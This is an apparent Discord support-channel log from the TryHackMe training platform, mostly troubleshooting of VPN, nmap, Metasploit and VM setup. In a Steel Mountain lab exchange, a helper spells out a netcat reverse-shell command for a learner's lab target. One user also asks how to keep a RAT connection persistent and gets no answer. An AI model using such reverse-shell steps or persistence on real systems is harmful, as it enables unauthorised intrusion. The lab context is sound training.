#site-support
1 messages ยท Page 149 of 1
that'd be nmap, correct ?
yep
well you don't need SSH to use nmap
oh
yup
i run it from my computer against the vm?
perfect, then all you gotta do is run nmap using the box's IP address, which is shown on top of the room's page
yup
Good to know
Hey guys, were can we get the student discount ?
email support@tryhackme.com about that : )
(send from your student email + mention your thm username)
Than you ๐
I can't find gobuster on the default Kali Linux install, and I also can't figure out how to install it
sudo apt install gobuster @candid pagoda
i tried
And what error did it give you?
Hmm. And that's on Kali?
Yes
I think they removed it in 2020
oh
Ah, that'd explain it
I did
Oh
Fortunately, I searched it up for you
Np
It worked
uh sorry to bother you guys again, do i lose all my progress if a room expires?
Nothing in the room changes
@pastel briar the room itself never expires, unless you leave
but everything in the VM is lost
If you leave the room, you don't lose your progress
ok i'm not really technical or knowledgeable
i was simply doing the learn linux, let's say i created a file
We're here for you :)
do i lose it tomorrow?
It won't be there next time
Once the VM expires or is terminated, it's gone
understood, i guess if i ever did a challenge room, it would have to be within one day
Nah
Take Lots
And Lots
Of notes
You'll find that if you keep copies of payloads
and write down credentials
As well as how you've done everything
You can return the same place you were previously very quickly
Notes are great
yo
so kind of stuck here with remmina
i wanna use it for the christmas room anyway installed it and when launching its outputting this
anything i can do at my end to avoid this ?
did you migrate to a stable process, @dawn hatch ?
So my isp is blocking vpn udp connection, is there any tcp connection using openvpn in tryhack me as in htb ?
Does anyone have their kali machine hosted at a remote location? Currently I use xrdp for a GUI but its sooo slow. Any ideas?
Don't use a GUI :p
jokes asides, you could SSH into it for the parts that aren't GUI stuff
Find the bottleneck in the connection and upgrade
Or lower the resolution, perhaps?
whats the best way to go about finding the bottleneck?
that's a good question!
Start by doing a speed test on your own machine vs a speed test server near your remote server
your remote server should have some sort of specs where you rent it. Look at those
i don't rent it, its a vm on an ESXI server at work
regardless, you should be able to find specs
alternatively, do a speedtest from the remote server to a speedtest server near your home machine
anyone has an idea about tcp vpn connection instead of the udp one ?
nmap scans takes more than 5min, is that oK? ;o
That'll be #room-help @distant carbon
gotcha
Hey I've got a problem on Advent on Cyber Day 4 task #6 where you need to create sha1 hash out of file8. The problem is that I generate that hash but it doesnt match the answer. My generated hash is "c993d881f79b5d79254b7c83477584d562edc700".
what student domains are supported for the discount? (other than .edu)
afair all student things are supported, just not all of them are automatic
ye, i mean automatic ones
Right
thanks!
^
v
does nessus update plugins over UDP or something? My network isn't super stable right now. I keep getting
[24/Mar/2020:13:52:10 +0100] [error] [feed_updater] Nessus Plugins: Network error while receiving data.
[24/Mar/2020:13:52:10 +0100] [info] [feed_updater] Nessus Plugins Update: Failed```
My connection to my VM just got killed and now the room tells me that this is a subscription only room although I'm subscribed according to my profile.
TryHackMe is an online platform for learning and teaching cyber security.
My token for Discord isn't working either.
I can't see why it would redirect you to the why-sub page
Close tab, open a new one and paste https://tryhackme.com/room/linuxctf into that new tab
TryHackMe is an online platform for learning and teaching cyber security.
I guess that this is the preview function here in Discord where I'm not logged in.
I already logged out and logged in again. Subscription status is ok, room tells me otherwise.
you broke hacked tryhackme, good job :D
๐
erm, I can't see how that would even happen
I did my best ๐
clear your cache and cookies or try in a different browser, perhaps?
Just to be clear, going to https://tryhackme.com/room/linuxctf takes you to /why-subscribe?
No, it doesn't. I see all the tasks and so on.
Yes, sir. I just can't start the VM.
Which I did before, but now it doesn't work anymore.
what happens when you try?
open task 1
Yes, it's back. But my VM got killed after about 30 minutes.
that's curious
oh?
Indeed. And my token isn't working. The bot told me that my token couldn't be found.
Yes, there was log message. Sorry, forgot to mention.
The machine is live and online, sorry for the trouble.
First things first, the tiemzone bug has been fixed in our development environment, we just need to push the codebase (just a few delays in pushing due to a new feature we're quickly implementing)
r.e the bot token
I have just tested your token, and it works:)
I would suggest to implement the deploy button outside of Task 1. Stupid me but I was in Task 3 and didn't even think about reopening Task 1 to restart the VM.
Ok, let me test the token once again.
did you recently upgrade to subscriber?
An hour ago or so, yes.
It's probably related to that in some weird way, but I'm not the devs here. Just a curious soul :D
Ok, let me test the token once again.
@torpid spade Dm the bot!verify <token>
DM me the token you're using:)
My bad, token's working, I was stupid. Thanks for your help everyone.
Did you send it your username? :p
Nope, I used the keyword token for the !verify command. I think I read it somewhere, but nevermind, just my fault.
And of course added my token afterwards. As I said, stupid me.
Right?
@torpid spade VMs are attached to tasks rather than rooms at the moment. I've suggested giving creators the ability to do either previously.
Though to be fair, sometimes it makes sense that the VM is with the task
That's why I suggested either, some rooms have multiple VMs
mhmn :)
I see, mk
did you migrate to a stable process, @dawn hatch ?
@latent fable I really didnt get the chance to do anything, it was so unstable. I hope today it will be better
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
sure
okay, so it wasnt in step 2 so i did that killall, started vpn ill do some pings and see if its fixed
will i have to redeploy the machine? or does that not matter
hm still cant ping machine
Which machine is it?
Sure
Yep, it's working for me
so now we know its a me problem
Can you screenshot the results of ps aux | grep openvpn for me?
before it was different ill say that
should i restart my machine? was i supposed to after installing the openvpn
Well, right now it's not working because you don't actually have a connection open
Try sudo openvpn <path-to-config> && ps aux | grep openvpn
Obviously replacing "<path-to-config>" with wherever the file actually is
Lovely
so everything works now ๐ nmap completed and all that, will i have to open vpn like that from now on or start as normal
Oh, I just added the bit on at the end so you could compare the two outputs of ps aux | grep openvpn
Just open it as normal
But be aware that if you've got more than one connection open (as I think happened in the first place), strange things can happen
oo okay
Symptoms include:
thank you for your time it is greatly appreciated ๐
We're working on docs for all this right now
oo
Np ๐
Hello, my metasploit tells me that the database is not connected ( i already inited it ) could this be because of the VPN ?
run sudo msfdb start
or sudo msfdb init if this is the first time you're running metasploit
exit msfconsole and start it again
ok ill try that
@barren birch howdy, its me again lmao joined a new room and im having the same problem, i tried killall openvpn and starting vpn again and it did not work, maybe i have to turn off something on my routers side? to limit connections idk
this is just weird to me
Killall needs sudo in front of it @tacit gale
oof good catch
Advice was written for old kali
Don't start a new VPN session once you have one running
worked ha
I'll put in a PR for the docs with that now
Is that re. troubleshooting openvpn? @barren birch
I've literally just added a sudo into the current Multiple VPN Connections page
Will that irritate any of your stuff?
ah okay no worries
I'm leaving the VPN alone just now. Focusing on Discord Docs
my PR would remove that file as I'm merging it & adding a lot of detail so - all good for now!
cough Trello ๐
Seems like we're the only ones actually contributing other than Matt and Skidy just now, so that kinda works
Aye aye, I'll do the Trello...
slaps wrist I spent 3 minutes doing those labels
๐
i did a PR but i'm not sure what's being worked by or not
'tis why I added the trello
We've got a Trello setup
I wanted to put the content of teaching
Well CMNatic does
Doesn't seem to have been done yet
Organize anything, together. Trello is a collaboration tool that organizes your projects into boards. In one glance, know what's being worked on, who's working on what, and where something is in a process.
i'm in
I'll post the invite link in Mentors @stone roost
oh
give me permissions
evening, trying to enter Linux challenges room it keeps popping with /why-subscribe
any one able to help
And you're subscribed, right?
no not at the min
Some of the rooms aren't free. Gotta pay with subscription :)
ok cool, it was on the getting stated challanges
Yeah, it's a bit.. well.. yeah :p
there are plenty of good free rooms, though
that said, the subscription is plenty worth it
๐
hello everyone. can someone be kind enough to point a noob in the right direction. Im currently subscribed and trying to get through the Steel Mountain room. I have an open meterpreter session and I've uploaded the powersploit successfully and it loaded onto the target. however, when I run powershell_shell, meterpreter gives: Error running command powershell_shell: ArgumentError wrong number of arguments (given 4, expected 5) How can I fix this? Thanks
I think that's a metasploit bug rn
@spring umbra #room-help
nah msf bug
it could also just be a missing option, but yeah, probably that bug
So you should try and use that
@latent fable I guess it must be some bug that needs patched for msf. I upgraded to the latest version, that didn't fix it. Then I found a thread on the subject and downgraded to 5.7 and that didnt work. I found some info that included .rb files, but that's where I get lost. I have no idea what to do with that. That was on rapid7's thread on the bug issue
just to be 1000% sure, could you post a picture of your options?
options for what? LHOST and such?
did you change LHOST?
at this point every sanity check is worth it, yes :p
yes that one is the my ip from thm
are you on the upgraded or downgraded version now?
downgraded
Hi im new so sorry if this is the wrong channel but does the VPN change your location because my location is the same
@south trout it's only a partial VPN meaning that it'll only route traffic that is relevent to THM
there's a word for it. I forgot what it is
help with what?
Privacy?
privacy from who?
Whats the difrence of a normal VPN and this VPN
this one doesn't route all traffic. It's just to give you acceess to the THM boxes
Pars i saw you lurking
fix me a latte too, plz
Get me a while chocolate mocha por favor
Maybe if you help Chuck above I'll consider it :p I'm a little lost :D
@latent fable this is what i get in meterpreter
he tried both upgrading and downgrading
ok, let me try
oh
same thing
@naive dust
Because you could just upload a nc.exe binary
which room was it for?
steel mountain
why can't i see nothing in http://MACHINE_IP
nope, same thing
The machine has to deployed @south trout
Then machine IP will be replaced with the actual machine ip
ok, now heres my dumb noob question--do i have to write that myself or can i google it
Are you using kali
yes
Then it should be in /usr/share/windows-binaries/
thanks.
Nc works the same as it does in linux
So you should just be able to do nc.exe -e cmd.exe <your ip> <port your listening on>
i found it, now how do i upload it ....nvm. i type slow
Same way you did your ps1 script
gotcha
how to use nmap
TryHackMe is an online platform for learning and teaching cyber security.
If you have any questions with that room you can ask over in #room-help @south trout
one more question @naive dust -- where do i type in what you said? on terminal before i upload to target?
You already uploaded the binary right
not yet im about to. i wanted to make sure i didnt have to prep it first
rce?
yes
So upload it
just not root yet
And then run <path to nc exe> -e cmd.exe <your ip> <the port your listening on>
And use kali's nc to listen on your host aswell
thanks for the help, @naive dust and @latent fable , I didnt get it yet, but right now my brain is mush. I've been trying this all day. learned a lot but i need a break.
No worries. You're doing something difficult right now. It might take more takes!
Did you update metasploit?
well, i was told when i started to learn Kali, to stay away from it. I was a US marine, you cant tell me no, lol. I am on disability so i have a ton of time to learn, and that's what i did. Im 25% finished the ceh career path in cybrary, plus ive completed a bunch of other courses to learn pentesting. I know it'll take time. i just get frustrated when i cant solve issues quickly
100%
You seem like a quick learner from what I've seen. Even if there's still much to learn
It's often a various laborious task at times - there's topics of Cybersecurity where you purely have to rely on luck and/or patience
"let me try this really stupid thing that no amount of fuzzing could ever guess at" --- "oh.. it worked.."
yeah, it's taking some hours, but it really gets to those itchy parts of my brain so Im really enjoying it
itchy brain sounds uncomfortable
yeah, but this whole hacking stuff really gets rid of it
That's great c:
For me it's partially a feeling of safety. As a developer I really oughta know what the attackers will be trying at
but it's also pretty cool
it has gotten to the point where nobody in the house wants me near their devices
I bet. Once you know a few tricks people will think you're magic :p
my goal (besides learning to secure networks against the bad guys) is to hack Rami Malek
har har :p
Thanks again everybody. i have to go get dinner. stay safe
cheers mate c:
hi
did anyone get burpsuite working on kali 32bits?
i've been looking for a working version but wasn't able to
hello, I am trying to get openvpn to work with Ubuntu. I've installed openvpn through <sudo apt-get install openvpn>. Now I'm trying to set up the configuration file by using the command <sudo openvpn --config configfilename.ovpn>. This is not working. I keep getting "Error opening configuration file: configfilename.ovpn." Does anyone know what the issue is?
Drop the --config part of that
I am getting the same error.
Can you screenshot that?
sudo openvpn file.ovpn
And ls @dapper parcel?
I'm going to assume that in your first screenshot, you were accessing the correct path?
yes
sudo openvpn ~/Downloads/file
Also it's just your tryhackme username, that's not really sensitive info
yeah and thanks @barren birch and @eager fulcrum sudo openvpn ~/Downloads/file worked!
ahhh
hello was trying to use hashcat but I get the following error when running the following command.
Command: hashcat -m 1800 hash.txt rockyou.txt --force.
Error:
-
Device #1: This device's constant buffer size is too small.
-
Device #1: This device's local mem size is too small.
No devices found/left.
I am using a VMware kali linux machine. 64 bit. I have allocated 4gb ram to the vm and the maximum hard disk space is 80 GB.
Thanks in advance
hashcat version is 5.1.0
i tried ssh with powershell , puTTY , external LXD terminal and it says connection refused and after changing ip it times out what to do
Hi, I'm trying to install kali linux on a virtualbox, I keep getting this error. I tried different settings, nothing works, any ideas?
Great
look at the writeup pls
I know I know
but when I input the bssid
nothing happens
by nothing I mean nothing
find a website which can show you a location based on bssid
https://github.com/Trackbool/WhereIsBSSID/
or use this
thanks
Anyone having issues connecting to the Linux box for beginners
It works on the windows side no problem but though my Kali it wouldn't connect.
are you connected to vpn from kali?
No just openvpn for the connection. It works fine on my windows side no issues just trying to use it in Kali gave me the issue. I think it has to do with the host key only populated for me once earlier after that no other box requested to trust so the connection was refused.
@dusk frigate it can be funny if the VM is connected through the host
Try killing the connection in the host and starting it up inside the VM
I was actually booted into Kali I have a dual boot machine. I powered off the Kali and switched to windows where it works fine but I will try running it in a VM instead on the windows side and see if that helps. I switched over because my Kali machine deployed on the site the cap locks got stuck and it would only type in capitals.
Thanks for the help you guys
hello i wanted to subscribe for THM but i dont have a .edu email
contacted the support team yesterday but still no response from their side
Hey @lucid eagle ! They're a small team and super hectic, but it's a fairly common query. They should hopefully get back to you real soon buddy!
Thanks for expressing your interest to subscribe however ๐
@zealous yoke i can understand, thanks for the reply ๐
@lucid eagle You can subscribe without a student email
Just at full price
ac.uk is supported as well
oh i see, that's alright i'll pay the full price then ๐
Oh sorry, my brain skipped a part of your message hehe. Yeah you can still subscribe! You just won't have the student discount. I thought you meant your .edu email wasn't being recognised
oh i see haha, i thought that showing the student ID would work before ๐
i'll subscribe in an hour
alright thanks !
Hhello
Unless you're about to ask for tech support, you're in the wrong chat @echo dune
Hey there if im trying to run kali I get this message, not booting up. Any ideas what I can do?
Bad install maybe
@civic smelt did you have something else installed at the partition that kali is currently installed? and if yes, did you format it before installing kali?
I did format it to ext4
Also created swap drive
Installed on MacBook Pro 2019
First installed boot camp win10, created 2 partitions within win10, installed rEFInd to macOS, bootet from kali stick, installed to ext4 volume, Cldnt set network mirror since hv no wired connection in kali setup
Thatโs the only thing I can think of
๐ค
But now win10 donโt start no more either
if that's the case then you've probably messed up the bootloader
but I've never user rEFInd so I'll leave this to someone else ^_^
(my initial thought was maybe you installed kali but forgot to format the partition)
kex_exchange_identification: Connection closed by remote host
Was just on through ssh on prt 22 no problem but 80 is not playing
What service is running on port 22? What service is running on port 80?
you could either look up the defaults, or do a nmap scan on those specific ports
Sounding like #room-help
that too
I press enter after pasting the bssid into wigle and nothing happens
I have to make an account?
I think I had to but it's been a while
how long should I wait?
Like a minute? I'll give it a go now with and without an account
But this is user error
@vivid bronze basic search redirects me to login
So yes,
you need an account
k
concatenate can you provide a better screenshot so I can see what it says on the screen
sorry meant @civic smelt
If you going to use refind its best to install it onto Kali then you have to switch your bios to boot from other os and it will use refind as the bootloader
You'll have to be a lot more specific @quartz knot. Also #room-help
VPNs inside VPNs definitely cause issues, even different VPN systems
Accidentally had my uni one on
hello im new iwant to join beginner group
how to ?
@covert musk #689615473620287603
they dont awnser :/
Then don't start posting in other channels please. This channel is for tech support. @covert musk
ok soory
This might sound stupid but i cannot seem to get the machine to run inside of the rooms,
i am connected to the website through open vpn
For some reason I can't get the owasp juice box up and running again. I was doing it earlier but fell asleep studying been up for a while. Now I can't connect to it at all.
Hi
I would like to Understand some ting If any one is on
What is The Use of An DMZ
You know the ting That Is near a Router Firewall Does it have a special Rolle
Cause its has not allot of securty
https://lmgtfy.com/?q=purpose+of+dmz and this is support for technical questions in regards to the THM platform
For all those people who find it more convenient to bother you with their question rather than search it for themselves.
@dusk frigate what do you mean?
@stone roost โค๏ธ
Can anyone help I canโt seem to full screen my Linux vbox
@civic smelt this is tech support related to the platform. however you might've not changed the resolution on the box. or installed the vbox tools
Sorry where to ask such question!?
I canโt change solution inside the box. What vbox tools we talk?
i ahve some doubts about the ctf100 room
?
on stage 6 i got the first flag and got ssh access
yes?
i cant su to level1?
on previous challenges the flag maybe the password
and there will be a little clue about it
but im stuck on the flag73
that's more of a question for #room-help or #room-hints but as the hint suggests make sure you checked all the files on the user's folder
you're going to facepalm yourself when you find it
Isn't that always how it is?
you should try ctf100 yourself
Maybe I will
then you can see why i hate @steel bobcat so much
so is it possible to get sudo if the only root account is root? (don't know roots pwd)
the challenges are awesome on ctf100
i know. i still have the last stage to finish
try ctf-collection afterwards, that's good too. also we are moving away from the topic of the room
^^ happy hacking
https://www.virtualbox.org/wiki/Downloads -
@stone roost hey man thanks but already installed
Does that include the virtualbox extension pack? @civic smelt
it's a bit out of remit for this discord exactly as Chev said. #site-support is related to the platform itself much rather then local environments.
IIRC though, if the VM is linux, doing sudo apt-get update and then sudo apt-get install open-vm-tools and restarting the VM is the recommended way
Does that include the virtualbox extension pack? @civic smelt
@zealous yoke yea
super annoying it wont work in fullscreen
well its fullscreen but the size is just smaller then the screen lol
A quick google around will help solve your issue @civic smelt ๐
@mossy coyote if you haven't left already, what's up with the rooms?
Hi,can someone please check my VM KALI Machine,is very unstable,continually disconnecting,thx
?
Firstly, you will need to download the configuration file associated with your account. This is done by visiting the TryHackMe "Access" page
@stone roost: So I followed that. I installed OpenVPN, downloaded the config file, ran OpenVPN as admin, imported the file, and pressed connect.
But I keep getting this:
Thu Mar 26 16:09:54 2020 TLS Error: TLS handshake failed
you're on windows?
Yeah
hmm, not sure @deep trellis any ideas?
i assume it might be isp blocking the connection
but if you are a subscriber you get your own kali box that you can control in the browser
I assumed so, but I was trying to do it the PuTTY way on my own machine
But if OpenVPN isn't working, it might be better to just stick with the Kali Machine
i'm using kali vm on my host, so i am not an expert at troubleshooting it
It's okay
Thank you so much for helping all the same
it's okay, sorry i can't be more of help :c
You tried. That's more than enough
Thank you
Sorry @stone roost...
Quick question... I can just access the ip address using the kali machine without needing openvp on the kali machine, right?
exact
I'm having problems with the VPN, getting disconnected a lot.
yes @sweet rain no vpn needed
Thank you!
@full pilot can you check you only have one instance on?
I only have one running
!multivpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
As I said, there's only one
Works perfectly fine now. Probably only some temporary connection issues. Thanks @spare blaze and @eager fulcrum for trying to help me :)
You are welcome, have fun :D
Refresh
now working fine
Restarted a service
It shouldn't have done that
but it did
Need to think of a better way to do something
hm
Some servers block ping requests
-Pn stops nmap from sending a ping first to see if the server is up
Is there any way to fix that
No, it just depends on the host you're trying to run nmap on
@vivid bronze What room is it?
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
Very unlikely that the room is downright broken
Muri's broken
??
I swear I was connected
c:
I did the openvpn thing
What even are instructions, James.
I still can't tell if two with one as root and one with sudo is just a part of kali 2020 or not
I get it as well @eager fulcrum -- but only when it's within tmux
Interesting
Mhm. Tmux separates the processes for some reason
Ok, That's fine
Open a new terminal
Okay thats where I messed it up then
Ah
I just used the one terminal
Yeah, new terminal, show us sudo ifconfig?
Ok, kill that machine, then redeploy it
In the mean time, can you ping 10.9.0.1 while you wait for it to boot?
What's on 10.9.0.1? Some testbox?
The VPN gateway
Ah, of course
it's responding
Lovely, so that's a definite connection
So it's the machine itself then
Give the CC: Pentesting box a little while to boot
Nah, I had it working a minute ago
Ah, fair ๐
but yeah, it was unclear~
how long is a little while
nope
5 minutes max then
it's working now
๐
And maybe the VM expired
hi , how do i add this server to my discord ... (whats the url of server for adding)
ih
hi guys im getting this error when i ssh "permission denied (publickey,gssapi-keyex,gssapi-with-mic)"
can someone please help me with this ?
@neat ginkgo You need to create a discord account, and join the server
@tough crown Is this for a room?
#room-help @tough crown
ohh ok ty
@vapid dawn For some reason I have connectivity issues to boxes when I boot into my Kali OS if I restart and boot into my windows I can connect fine.
It affects the browser, trying to ssh into a box and the putty client as well.
Why ping Ashu?
He asked me what was going on earlier when I originally asked the question earlier this morning.
Ah, cool ๐
here
yes
Keep reading through the tasks -- it'll tell you how to connect
There's no web server on that machine ๐
maybe im a degenerate lol
You'd be surprised how many people make that mistake
adven room not loading
A bad code repo was pushed to prod. Check #site-bugs for an update
k
do I need to have the same account name on site and on my linux box to connect to VPN ?
ack
!vpn
hey im havin an issue with connecting to the openvpn
I use to be able to
What's happening or not happening?
so it gets to this
but the thing is thats all it gets too and I cant do anything now
Control C and run the command again
And you can't use that terminal while OpenVPN is running in there unless you background it
What I do personally, is have a seperate tab for OpenVPN
Do you see Route Add in there somewhere?
I cant see that
Then it's not connected fully
There's some steps after where it's getting to so far
so what I sent is the only thing that I see
Control C, try again
Sometimes openvpn seems to get confused
Also make sure there's not another session running
!multivpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
I was so scared lmaooo
One VPN session. Only 1. No more, no less. Otherwise things won't work.
yeah so it seems that using sudo rather than running as root will give 2 instances
One as root, and one with sudo
Seems to be just how Sudo works
I don't think you need to fix it?
well it was giving me the same issue
so I just killed all
and went on the other tab and it started working
Hey can i ask an unrelated question here
To a RAT connection that i got on a target machine
You can ask, but preferably over in #thm-community-media ๐
How do i make it persistent and not lose it after a restart im worried
(Also, this had better be legal ๐ )
hi there, video's are unwatchable, buffering every second, is it normal ?
@tawny portal You'd need to do GPU passthrough which is a pain
Hashcat does have Windows builds
Which I would recommend using
You can run hashcat from Powershell/CMD and use your GPU
Okay I see
That's what I do
I was going to
apt-get install nvidia-driver
apt-get install nvidia-smi
Reboot
apt-get install nvidia-cuda-toolkit
but cba, i'll just get hashcat on win
Nvidia doesn't like being passed through to VMs as that's what the premium cards have as an advantage
You'd need a second GPU for your host system
That's Ok ๐
Type in ping 10.9.0.1
Great! That means you're connected, yep
@barren birch With 2020.1 and other non root OS, there seems to be 2 processes
One with Sudo as root, and one running as root as a result of sudo
Yep, that was my conclusion as well
Meaning the multivpn command and docs need updating
*sigh*
Might be best just including a screenshot of what's good and what isn't
@gilded snow are you connected to the VPN?
yeah openvpn using linux
Can you ping 10.9.0.1?
no output
Ok, screenshot ps aux | grep openvpn for me?
Ah
Yeah
That's the problem
The file can only be used once -- you have rather more than one connection open ๐
sudo killall openvpn
Then restart it ๐
seriously !!!
That working now?
yeah it's working now thanks a lot
No problem ๐
i thought that was my firewall or something else
Ah -- nah. That's about the most common problem we see around here. You'll know how to deal with it next time though ๐
yeah i think so ๐
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
The bot can remind you
ahhh cool
The IP on your network info page is your own IP
Np ๐
Well done figuring it out
so, I'm trying to figure out where I should start
I'm confident I know the basic basics
but I don't wanna start somewhere I don't understand
like, I'm pretty sure I can skip this intro to linux
idk
It's worth doing ๐
If you're confident though
The primer series is a good place to start
RP: Nmap is a really good one to go with
the machine from day 18 in Advent room is down
@naive dust are you sure you are connected to VPN
๐
Hey don't know If i post this here, forgot my password so when I do the forgot password thing it goes through fine but I never get an email.
I'm just guessing my password at this point but I've tried a bunch
In https://tryhackme.com/room/metasploit I'm having trouble migrating and dropping to shell. This is the problem with the unstable newer versions of metasploit, correct?
What metasploit version are you running?
Framework: 5.0.81-dev
Console : 5.0.81-dev
Interesting, I thought they fixed it
yes, I heard others say the same (I may even have echoed it), but there was another guy who had similar issues with the 81 a few days ago, if i remember correctly
What chipset is the adapter?
patience :p
well, google model monitor mode replacing model
sounds like you might not be able to use if for monitor mode then
There are some really cheap ones out there
@crimson star https://github.com/aircrack-ng/rtl8188eus
It exists, just needs drivers for monitor mode
That's a bug
edit:
We're working on diagnosing it
I've added one hour and it disappeared
oh, ok
Is this for the kali room?
blue
Interesting
bug.... feature ;D
If you could post it to #site-bugs that'd be great
allright, I'll do that, thanks ๐
thx
Hi,is there any update on site again as i am getting pop up messages with network disconnection in kali vm
?
Site seems okay to me @naive dust, have a read through of here: https://docs.tryhackme.com/docs/openvpn/troubleshooting/openvpn-troubleshooting
No Connectivity
see if that results in anything fruitful ๐
Let us know how you get on!
now its a bit better without me doing anything
@zealous yoke the THM kali machine, so no VPN involved here
Looking back, I see your point of view @eager fulcrum thanks. Apologies.
I should sit back for a while I think, been a long week.
Hi. Can anyone tell me is there a command to shut down openvpn when I'm finished? I ran ifconfig 2 hours after I was done and I was still connected.
@fickle girder on Linux?
Yes
@fickle girder run the command in the foreground in a terminal tab
Ctrl+c in the terminal
Although that won't work it the process is running in the background
I use Terminator a d just split my terminal screen a few times. I usually ctl+c but it still runs.
I run reboot-f to stop it.
just thought there was some command that I was overlooking. Thanks guys.
@barren birch thanks!
Np
Really dont know why I can't see the machine web
Web page
Im connected to the vpn
What machine?
Hey ive tried other box like basic pentesting
I have connected. Maybe theres a problem on the vulnversity box or there something to do to that
@tropic minnow be sure you are connected to the network by checking ifconfig or just by ping the target ip
@tropic minnow if youโre connecting on port 80 youโre doing it wrong, scan the host ports
I joined a room and it got expired
Now iam not able to deploy
How to redeploy again ??
refresh
Dint work
@tropic minnow be sure you are connected to the network by checking ifconfig or just by ping the target ip
@crimson star i am connected. As you see i can see the basic pentesting box web page
hi, i'm currently doing the Linux challenges room. i'm using the Kali machine in the browser and all is going well. However if i do any other rooms such as the 'learn Linux' room, this option to open in browser does not show up. Does anyone have any idea why this is the case?
this is the view of the 'learn linux' room, as you can see the open in browser option is missing here
@naive dust most machines don't have guacamole (in browser) support
I think there are three that do? Maybe slightly more
Kali is one of them
The idea is that you connect to the machines from your own computer
Or, as you're a subscriber, you can use the in-browser kali instead
But you'll still need to connect into most remote machines, be it from your own computer, or subscriber kali
thanks @barren birch ! that explains it
Np ๐
can i post he vpn problem here ?
tun0 is shwoing same ip
and unble to kill the process for that
even openvpn is not connected
!multivpn
Type ps aux | grep openvpn into your terminal and press enter
If there's more than one line (and the second doesn't have "grep" in it), do the following steps
Type killall openvpn into your terminal and press enter
Start the VPN with sudo openvpn <path-to-config>
What do you mean? tun0 should be showing your THM IP. If it exists then the tunnel is open
but tun0 is showing with the same ip as after assigning
like i connected to tryhackme server
then kill the openvpn
then run the command
ifconfig
tun0 will be their
ps aux | grep openvpn
Try sudo killall openvpn
wait let me do that
Or that, to diagnose ^^
still their
Try the command James sent, and screenshot the output?
shouldn't sudo get all of them?
It should, I just put that in, just in case it was running as a regular user and sudo wasn't catching them for some reason ๐คทโโ๏ธ
It's just refusing to kill them. That's bizarre
Yeah, restart it
That'd do the job
lmgt
Try:
sudo killall -9 openvpn```
If you haven't already restarted it
I mean, that should be default, but ๐คทโโ๏ธ
yea that work


